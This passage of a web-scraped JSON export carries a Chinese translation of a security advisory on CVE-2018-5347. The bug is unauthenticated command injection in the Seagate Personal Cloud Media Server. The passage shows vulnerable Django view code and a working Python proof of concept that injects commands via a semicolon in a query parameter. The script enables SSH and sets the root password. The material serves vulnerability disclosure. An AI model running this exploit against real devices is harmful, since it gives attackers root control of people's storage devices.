class=\"crayon-e\">uID <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;status&#8221;:&#8221;In Progress&#8221;}}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">elif<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;url&#8221;:&#8221;%s&#8221;, &#8220;fileSize&#8221;:&#8221;%d&#8221;}}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quote<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;utf-8&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getsize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;853&#8243;,&#8221;message&#8221;:&#8221;Id not recognized.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getstatusoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216; start &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">time_stamp<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;archiveID&#8221;:&#8221;%s&#8221;}}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">except<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<p>\u8bf7\u6ce8\u610f\uff0c\u8fd9\u4e24\u4e2aviews\u90fd\u5305\u542bcsrf_exempt decorator\uff0c\u5b83\u4f1a\u7981\u7528Django\u7684\u9ed8\u8ba4\u5f00\u542f\u7684CSRF\u4fdd\u62a4\u3002 \u56e0\u6b64\uff0c\u8fd9\u4e9b\u95ee\u9898\u53ef\u4ee5\u901a\u8fc7\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6765\u8fdb\u884c\u5229\u7528\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><br \/> \u4e0b\u9762\u7684\u6f0f\u6d1e\u9a8c\u8bc1\u4ee3\u7801\u5c06\u5c1d\u8bd5\u542f\u7528SSH\u670d\u52a1\uff0c\u5e76\u66f4\u6539root\u5bc6\u7801\u3002 \u5982\u679c\u6210\u529f\uff0c\u5219\u53ef\u4ee5\u4f7f\u7528\u65b0\u5bc6\u7801\u901a\u8fc7SSH\u767b\u5f55\u8bbe\u5907\u3002<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a666371ac364825426699\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python  import os  import urllib       scheme = &#8216;http&#8217;  host = &#8216;personalcloud.local&#8217;  port = &#8217;80&#8217;  path = &#8216;uploadTelemetry.psp&#8217;  querystr = &#8216;TimeStamp=%3b&#8217;  #path = &#8216;getLogs.psp&#8217;  #querystr = &#8216;time_stamp=%3b&#8217;  password = &#8216;Welcome01&#8217;       cmds = [&#8216;ngc &#8211;start sshd 2&gt;&amp;1&#8217;,        &#8216;echo -e &#8220;%(s)sn%(s)s&#8221;|passwd 2&gt;&amp;1&#8217; % {&#8216;s&#8217; : password}]       for cmd in cmds:     print &#8216;Running command&#8217;, repr(cmd)     cmd = urllib.quote_plus(cmd)     r = urllib.urlopen(&#8216;%s:\/\/%s:%s\/%s?%s%s&#8217; % (scheme, host, port, path, querystr, cmd))     print r.read()       print &#8216;Log in with&#8217;, password  os.system(&#8216;ssh -p 2222 root@%s&#8217; % host)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urllib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-4\"><span class=\"crayon-e\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-5\"><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;http&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-6\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;personalcloud.local&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-7\"><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8217;80&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-8\"><span class=\"crayon-v\">path<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;uploadTelemetry.psp&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-9\"><span class=\"crayon-v\">querystr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TimeStamp=%3b&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-10\"><span class=\"crayon-p\">#path = &#8216;getLogs.psp&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-11\"><span class=\"crayon-p\">#querystr = &#8216;time_stamp=%3b&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-12\"><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Welcome01&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-14\"><span class=\"crayon-v\">cmds<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;ngc &#8211;start sshd 2&gt;&amp;1&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;echo -e &#8220;%(s)sn%(s)s&#8221;|passwd 2&gt;&amp;1&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-17\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cmd <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmds<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Running command&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">repr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quote_plus<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;%s:\/\/%s:%s\/%s?%s%s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">querystr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-21\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-23\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Log in with&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">password<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-24\"><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;ssh -p 2222 root@%s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0019 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3648\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 12:07:17 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e24\u4e2a\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002 \u5e0c\u6377\u4e2a\u4eba\u4e91\u5bb6\u5ead\u5a92\u4f53\u5b58\u50a8\u8bbe\u5907\u662f\u201c\u5b58\u50a8\uff0c\u6574\u7406\uff0c\u6d41\u5f0f\u4f20\u8f93\uff0c\u5171\u4eab\u6240\u6709\u97f3\u4e50\uff0c\u7535\u5f71\uff0c\u7167\u7247\u548c\u91cd\u8981\u6587\u6863\u7684\u6700\u7b80\u5355\u7684\u65b9\u5f0f\u201d\u3002 \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458Yorick Koster\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002 \u5382\u5546\u54cd\u5e94 \u5e0c\u6377\u572810\u670816\u65e5\u88ab\u544a\u77e5\u8be5\u6f0f\u6d1e\uff0c\u867d\u7136\u5df2\u786e\u8ba4\u6536\u5230\u6f0f\u6d1e\u4fe1\u606f\uff0c\u4f46\u62d2\u7edd\u56de\u5e94\uff08\u6211\u4eec\u7ed9\u51fa\u7684\uff09\u6280\u672f\u7ec6\u8282\uff0c\u4e5f\u6ca1\u6709\u7ed9\u51fa\u786e\u5b9a\u7684\u4fee\u590d\u65f6\u95f4\u6216\u662f\u534f\u8c03\u62a5\u544a\u3002 CVE\uff1aCVE-2018-5347 \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f Seagate Media Server\u4f7f\u7528Django Web\u6846\u67b6\u5e76\u6620\u5c04\u5230.psp\u6269\u5c55\u540d\u3002 \u4efb\u4f55\u4ee5.psp\u7ed3\u5c3e\u7684URL\u90fd\u4f1a\u4f7f\u7528FastCGI\u534f\u8bae\u81ea\u52a8\u53d1\u9001\u5230Seagate Media Server\u5e94\u7528\u7a0b\u5e8f\u3002 \/etc\/lighttpd\/conf.d\/django-host.conf: [crayon-5a666358f0897494367467\/] URL\u88ab\u6620\u5c04\u5230\u6587\u4ef6\/usr\/lib\/django_host\/seagate_media_server\/urls.py\u4e2d\u7279\u5b9a\u7684views\u3002 \u6709\u4e24\u4e2aviews\u53d7\u5230\u672a\u7ecf\u8ba4\u8bc1\u7684\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002 \u53d7\u5f71\u54cd\u7684views\u662f\uff1a uploadTelemetry getLogs \u8fd9\u4e9bviews\u4eceGET\u53c2\u6570\u83b7\u53d6\u7528\u6237\u8f93\u5165\uff0c\u5e76\u5c06\u8fd9\u4e9b\u672a\u7ecf\u9a8c\u8bc1\/\u89e3\u6790\u7684\u53c2\u6570\u4f20\u9012\u7ed9Python\u6a21\u5757\u76f8\u5e94\u7684\u51fd\u6570\u3002 \u8fd9\u5141\u8bb8\u653b\u51fb\u8005\u6ce8\u5165\u4efb\u610f\u7684\u7cfb\u7edf\u547d\u4ee4\uff0c\u8fd9\u4e9b\u547d\u4ee4\u5c06\u4ee5root\u6743\u9650\u6267\u884c\u3002 \/usr\/lib\/django_host\/seagate_media_server\/views.py\uff1a [crayon-5a666358f08a3012049689\/] \/usr\/lib\/django_host\/seagate_media_server\/views.py: [crayon-5a666358f08a8093835846\/] \u8bf7\u6ce8\u610f\uff0c\u8fd9\u4e24\u4e2aviews\u90fd\u5305\u542bcsrf_exempt decorator\uff0c\u5b83\u4f1a\u7981\u7528Django\u7684\u9ed8\u8ba4\u5f00\u542f\u7684CSRF\u4fdd\u62a4\u3002 \u56e0\u6b64\uff0c\u8fd9\u4e9b\u95ee\u9898\u53ef\u4ee5\u901a\u8fc7\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6765\u8fdb\u884c\u5229\u7528\u3002 \u6f0f\u6d1e\u8bc1\u660e \u4e0b\u9762\u7684\u6f0f\u6d1e\u9a8c\u8bc1\u4ee3\u7801\u5c06\u5c1d\u8bd5\u542f\u7528SSH\u670d\u52a1\uff0c\u5e76\u66f4\u6539root\u5bc6\u7801\u3002 